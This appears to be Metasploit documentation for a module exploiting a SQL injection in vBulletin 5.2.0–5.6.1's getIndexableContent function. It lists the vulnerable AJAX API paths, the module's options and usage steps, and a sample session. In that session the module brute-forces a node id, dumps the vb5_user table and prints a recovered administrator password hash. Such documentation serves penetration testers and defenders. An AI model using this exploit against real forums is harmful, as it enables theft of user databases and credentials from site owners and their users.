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Vulnerable Application

vBulletin A popular PHP bulletin board and blog web application. This module has been tested successfully against vBulletin 5.6.1 running on Ubuntu Linux 19.04


This module exploits a SQL injection vulnerability present in vBulletin 5.2.0 through 5.6.1 in the getIndexableContent function. This vulnerability is triggered through the nodeId variable and can be reached through multiple paths (listed below) but is exploited in this module utilizing the /ajax/api/content_infraction/getIndexableContent path.

  • /ajax/api/content_video/getIndexableContent
  • /ajax/api/content_text/getIndexableContent
  • /ajax/api/content_report/getIndexableContent
  • /ajax/api/content_redirect/getIndexableContent
  • /ajax/api/content_privatemessage/getIndexableContent
  • /ajax/api/content_poll/getIndexableContent
  • /ajax/api/content_photo/getIndexableContent
  • /ajax/api/content_link/getIndexableContent
  • /ajax/api/content_infraction/getIndexableContent
  • /ajax/api/content_gallery/getIndexableContent
  • /ajax/api/content_event/getIndexableContent
  • /ajax/api/content_channel/getIndexableContent
  • /ajax/api/content_attach/getIndexableContent

Each path listed above reaches the getIndexableContent function within the /core/vb/library/content.php file. The SQL injection attack used utilizes a UNION query in order to leak data back in the response rawtext field. The data stored on the file system contains the entire user table or a dump of all the vBulletin tables in json format.

Verification Steps

  1. Do: use auxiliary/gather/vbulletin_getindexablecontent_sqli
  2. Do: set RHOSTS [IP]
  3. Do: set VHOST [HOSTNAME]
  4. Do: set TARGETURI [PATH]
  5. Do: run



A valid node id value for the vBulletin install. When provided, this value is used instead of that acquired by brute-forcing


A minimum nodeid value to begin with when brute-forcing for a valid node id. Default: 1


A maximum nodeid value to end with when brute-forcing for a valid node id. Default: 200


The base URI path of vBulletin. Default: /


msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set RHOSTS
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set VHOST vb.local
VHOST => vb.local
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > set TARGETURI /
msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > show actions 

Auxiliary actions:

   Name      Description
   ----      -----------
   DumpAll   Dump all tables used by vbulletin.
   DumpUser  Dump only user table used by vbulletin.

msf5 auxiliary(gather/vbulletin_getindexablecontent_sqli) > run

[*] Running module against
[*] Brute forcing to find a valid node id.
[+] Successfully found node at id 1
[*] Attempting to determine the vBulletin table prefix.
[+] Successfully retrieved table to get prefix from vb5_language.
[*] Getting table columns for vb5_user
[+] Retrieved 78 columns for vb5_user
[*] Dumping table vb5_user
[*] Table contains 1 rows, dumping (this may take a while).
[+] Found credential: administrator:$2y$15$I5t0BGBeYaYGbaRhhBr8g.EBax846Jx3B6ady..nwuPxOWAYicYvi (Email:
[+] Retrieved 1 rows for vb5_user
[+] Saved file to: /home/zenofex/.msf4/loot/20200522180431_default_192.168.1.100_vb5_user_305077.txt
[*] Auxiliary module execution completed